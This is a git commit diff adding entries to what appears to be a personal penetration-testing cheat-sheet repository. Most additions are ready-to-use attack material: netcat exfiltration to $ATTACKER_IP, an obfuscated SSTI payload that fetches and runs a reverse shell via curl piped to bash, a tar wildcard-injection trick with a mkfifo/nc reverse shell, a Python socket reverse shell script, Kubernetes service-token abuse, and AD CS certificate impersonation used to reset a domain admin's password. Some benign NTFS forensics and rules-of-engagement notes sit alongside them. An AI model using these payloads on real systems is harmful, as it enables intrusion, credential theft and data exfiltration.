bump

.gitmodules

@@ -133,3 +133,6 @@
 [submodule "misc/static-binaries"]
 	path = misc/static-binaries
 	url = https://github.com/andrew-d/static-binaries.git
+[submodule "stego/stego-toolkit"]
+	path = stego/stego-toolkit
+	url = https://github.com/DominicBreuker/stego-toolkit.git

enumeration/docs/kubectl.md

@@ -0,0 +1,37 @@
+# Kubectl
+
+```sh
+kubectl get pods
+```
+* Check mounted secret
+```sh
+kubectl auth can-i --list
+kubectl get secrets
+kubectl get nodes
+kubectl get deployments
+kubectl get services
+kubectl get ingress
+kubectl get jobs
+```
+* Intel about a secret, and output
+```sh
+kubectl describe secrets <secret> 
+kubectl describe secrets <secret> -o 'json'
+```
+## Abuse Token
+* Inside a pod the service token(jwt) can be found under `/var/run/secrets/kubernetes.io/serviceaccount/token`
+* By change of an LFI extract the token and 
+```sh
+kubectl auth can-i --list --token=$TOKEN
+kubectl get pods  --token=$TOKEN
+kubectl exec -it <pod name> --token=$TOKEN -- /bin/sh
+```
+
+## Create Pods
+
+* Use [BishopFox's BadPods](https://github.com/BishopFox/badPods.git)
+* If there is no internet connection add `imagePullPolicy: IfNotPresent` to the YAML file
+```sh
+kubectl apply -f pod.yml --token=$TOKEN
+kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash
+```

enumeration/snmp/onesixtyone.md

@@ -0,0 +1,11 @@
+# SNMP Enumeration
+
+* Find community strings
+```sh
+onesixtyone $TARGET_IP -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt
+```
+* Query users
+```
+snmpwalk -v2c -c <community_string> $TARGET_IP 1.3.6.1.4.1.77.1.2.25
+```
+

exfiltration/linux/nc.md

@@ -0,0 +1,11 @@
+# Netcat
+
+* RX
+```sh
+nc -lp 8080 > out.txt
+```
+* TX
+```sh
+nc $ATTACKER_IP 8080 < in.txt
+```
+* Have to be end manually after a while

exfiltration/windows/evil-winrm.md

@@ -0,0 +1,6 @@
+# Evil-winrm
+
+* Put the stuff to download into a writeable/readable directory like `C:\Windows\Temp`
+```sh
+download C:\Windows\Temp\<file>
+```

exploit/web/ssti/ssti.md

@@ -57,3 +57,8 @@ template = "User input is {{ input }}"
 return render_template_string(template, input=input)
 ```
 
+## Bypass
+* Save reverse shell as `rev`
+```sh
+{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("curl $ATTACKER_IP:8000/rev | bash")|attr("read")()}}
+```

exploit/wildard_exploitation.md

@@ -5,6 +5,12 @@
 
 * cronjob gets backup data from `/var/www/html` via `tar cf backup.tar *`. The reverse shell and the parameters need to be files in this directory to get called by tar and be executed.
 
+```sh
+echo "mkfifo /tmp/oytqnhq; nc <IP> <PORT> 0</tmp/oytqnhq | /bin/sh >/tmp/oytqnhq 2>&1; rm /tmp/oytqnhq" > shell.sh
+echo "" > "--checkpoint-action=exec=sh shell.sh"
+echo "" > "--checkpoint=1"
+```
+or 
 ```sh
 echo "mkfifo /tmp/oytqnhq; nc <IP> <PORT> 0</tmp/oytqnhq | /bin/sh >/tmp/oytqnhq 2>&1; rm /tmp/oytqnhq" > /var/www/html/shell.sh
 touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"

forensics/ntfs.md

@@ -0,0 +1,48 @@
+# NTFS
+
+* Has the following advantages over FAT
+    * Journaling 
+    * ACL
+    * Volume Shadow Copy
+    * Alternate Data Stream
+
+## Master File Table
+* VBR references to `$MFT`
+* `$LOGFILE` stores transactions of the file system
+* `$UsnJrnl` changed files, and reason for change
+
+## Caching
+
+* File information is cached for frequent use in 
+```sh
+C:\Windows\Prefetch\*.pf
+```
+* An SQLite database can be found under
+```sh
+C:\Users\<username>\AppData\Local\ConnectedDevicesPlatform\{randomfolder}\ActivitiesCache.db
+```
+
+## Jumplist
+
+* Stores recently used files of applications inside the taskbar 
+```sh
+C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations
+```
+
+## Shortcut Files
+```sh
+C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Recent\
+C:\Users\<username>\AppData\Roaming\Microsoft\Office\Recent\
+```
+
+## Internet Explorer History
+```sh
+C:\Users\<username>\AppData\Local\Microsoft\Windows\WebCache\WebCacheV*.dat
+```
+
+## Removeable Device Setup Log
+```sh
+C:\Windows\inf\setupapi.dev.log
+```
+
+

misc/AD_CS.md

@@ -0,0 +1,50 @@
+## Active Directory Certificate Service ADCS
+
+* Internal CA
+* PKI
+* File system encryption
+* Digital signatures
+* User authentication
+
+* __Certificates will not be revoked after account password reset__
+
+## Certificate Templates
+
+* Extended/Enhanced Key Usage 
+* Parameter combination can be exploited
+
+### Enumeration
+
+* [PSPKIAudit](https://github.com/GhostPack/PSPKIAudit)
+
+```sh
+certutil -v -template > ct.txt
+```
+
+Exploitable templates should have the following traits:
+* `Allow Enroll` or `Allow Full Control` permissions to request certificate
+    * Find groups by `net user <username> /domain` --> `Domain Users`, `Domain Computers`
+* Client authentication EKU for Kerberos authentication --> `Client Authentication`
+* Permission to subject alternative name (SAN), e.g. URL to encrypt. Used to create Kerberos ticket, --> `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`
+ 
+### Certificate Creation
+
+* `Win+R` --> `mmc` --> `File` --> `Add/Remove Snap-in` --> `Certificates` (Request Certificate if administration account --> Computer Account)
+* After that in the main menu, `Certificates` --> right click on `Personal` --> `All Tasks` --> `Request Certificates` --> `Next` --> `Next` --> `More information is required to enroll this certificate` --> `Common Name` --> `CN=concerto` && `User Principal Name` is the user to impersonate --> `OK` --> select `User Request` --> `Enroll`
+* After that in the main menu, `Personal` --> `Certificates` --> __The certificate__
+* Right click certificate --> `All Tasks` --> `Export` --> `Yes, export private key` --> `PFX` --> set `Password` --> Save
+
+### Impersonation 
+
+* Request TGT with the created cert
+* Grab TGT
+
+* On the machine via
+```sh
+Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to> /domain:<domain name> /dc:<IP of domain controller>
+```
+* Select a domain admin via opening `Active Directory Users and Computers`
+```sh
+.\Rubeus.exe changepw /ticket:<ticketfilename> /new:<new password> /dc:<domain of controller> /targetuser:<domain>\<dauser>
+```
+* `runas /user:<domain>\<username of DA> cmd.exe`

pentesting.md

@@ -1,10 +1,21 @@
 # Pentesting
 * [Pentesting Execution Standard](http://www.pentest-standard.org/index.php/Main_Page)
 Authorized audit of security systems of computers and networks.
-* [Rules of Engagement -- Cheat Sheet](https://sansorg.egnyte.com/dl/bF4I3yCcnt/?)
+* [Rules of Engagement -- Cheat Sheet](https://sansorg.egnyte.com/dl/bF4I3yCcnt/?) and [redteam.guide ROEs](https://redteam.guide/docs/templates/roe_template/)
     * Permissions
-    * Scope
+    * Engagement --> internal/external pentest or adversary emulation of APTs
+    * Scope --> networks, IPs, exfilration of data, which stage, downtime, DDoS
     * Rules
+* NDA
+
+## Campaign
+* [Checklist](https://redteam.guide/docs/checklists/red-team-checklist/)
+* [vectr.io](https://vectr.io)
+
+* Engagement --> Concept of Operations (CONOPS), Resource and Personnel Requirements, Timelines
+* Operations --> Operators, Known Information, Responsibilities
+* Mission --> Exact commands to run and execution time of the engagement
+* Remediation --> Report, Remediation consultation
 
 ## Methodology
 

reverse_shells/sock_shell.py

@@ -0,0 +1,10 @@
+import os
+import socket
+import subprocess
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(("#Target", 3000))
+os.dup2(s.fileno(), 0)
+os.dup2(s.fileno(), 1)
+os.dup2(s.fileno(), 2)
+import pty;pty.spawn("/bin/bash")

stego/stego-toolkit

@@ -0,0 +1 @@
+Subproject commit 4e6c2daf5ce08dfdbb9f9711f92f686eee3a6348